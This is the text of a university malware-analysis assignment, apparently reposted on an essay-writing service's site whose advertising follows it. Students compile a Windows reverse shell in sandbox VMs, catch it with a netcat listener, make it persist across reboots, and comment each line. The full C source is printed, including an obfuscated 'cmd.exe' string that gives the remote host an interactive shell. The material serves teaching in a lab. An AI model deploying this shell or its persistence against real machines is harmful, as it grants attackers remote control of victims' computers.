SimpleReverseShell.7zCAP 4145 Introduction to Malware Analys
SimpleReverseShell.7zCAP 4145 Introduction to Malware Analysis Assignment 6 – Analyze Malicious Windows Programs 19 points Instructions: Note: Blue text points to a web link. Ctrl + Click to follow link.This is a team assignment. However, every student MUST submit the term project report even if all members of a group submit the same report.Answers to all questions must be put into ONE document. That is, every time, each student can only submit one report document, answering all questions of this assignment, if not explicitly stated otherwise. Students must put answers following each question in this assignment. The instructor will not grade a report with only answers in it and the student gets zero for such an assignment. An assignment report must include original questions.Students MUST submit the finished assignment in either Microsoft Word or pdf format to Webcourse. The doc must be submitted as ONE standalone file and cannot be tarred or zipped into a container.All required files or docs must be submitted in one submission (last submission). Note: Blackboard allows unlimited number of submission of one assignment by students.Refer to Print screen on how to take a screenshot. Pressing the Alt key in combination with PrtSc will capture the currently selected window. Problems: Answer each question following the original question. Do NOT delete the original question. The students are provided SimpleReverseShell.7z, which contains source code of a reverse shell. Requirements: The code shell.c in SimpleReverseShell.7z is given below. The students can refer to readme.txt in SimpleReverseShell.7z and search Google for specific APIs. Answer the questions following the code below. Please read compile.sh and revise it for the programming environment chosen by the students. Hint: The programming environment is similar to the one in Assignment 5.Paste the revised compile.sh following this question. (2 points)Run compile.sh and provide a screenshot that shows the compiled program.(1 point)Please read readme.txt and understand how to run the program. That is, the students should first start a nc (netcat) command as a server that accepts incoming connections at the sandbox VM LINUX01. On the sandbox VM WINHOST01, the students start the malware. Please write down the commands the students run on LINUX01 and WINHOST01 following this questions. (2 points)Please provide a screenshot that shows the result of running the malware. (1 point)Please select an approach so that the malware can start when WINHOST01 reboots. Please explain the chosen approach. (2 points)Please post related commands or screenshots following this question to show the chosen approach works. (2 points) // shell.c #include #include #pragma comment(lib, ‘w2_32’) WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; char aip_addr[16]; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; int main(int argc, char *argv[]) { WSAStartup(MAKEWORD(2,2), &wsaData); Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); if (argv[1] == NULL){ exit(1); } struct hostent *host; host = gethostbyname(argv[1]); strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); hax.sin_family = AF_INET; hax.sin_port = htons(atoi(argv[2])); hax.sin_addr.s_addr =inet_addr(aip_addr); WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL); if (WSAGetLastError() == 0) { memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb=sizeof(ini_processo); ini_processo.dwFlags=STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; char *myArray[4] = { ‘cm’, ‘d.e’, ‘x’, ‘e’ }; char command[8] = ”; snprintf( command, sizeof(command), ‘%s%s%s%s’, myArray[0], myArray[1], myArray[2], myArray[3]); CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info); exit(0); } else { exit(0); } } Please give a comment to each instruction above, and explain what each instruction does. (8 points)Please explain what this program does. (1 point)
Collepals.com Plagiarism Free Papers
Are you looking for custom essay writing service or even dissertation writing services? Just request for our write my paper service, and we'll match you with the best essay writer in your subject! With an exceptional team of professional academic experts in a wide range of subjects, we can guarantee you an unrivaled quality of custom-written papers.
Why Hire Collepals.com writers to do your paper?
Quality- We are experienced and have access to ample research materials.
We write plagiarism Free Content
Confidential- We never share or sell your personal information to third parties.
Support-Chat with us today! We are always waiting to answer all your questions.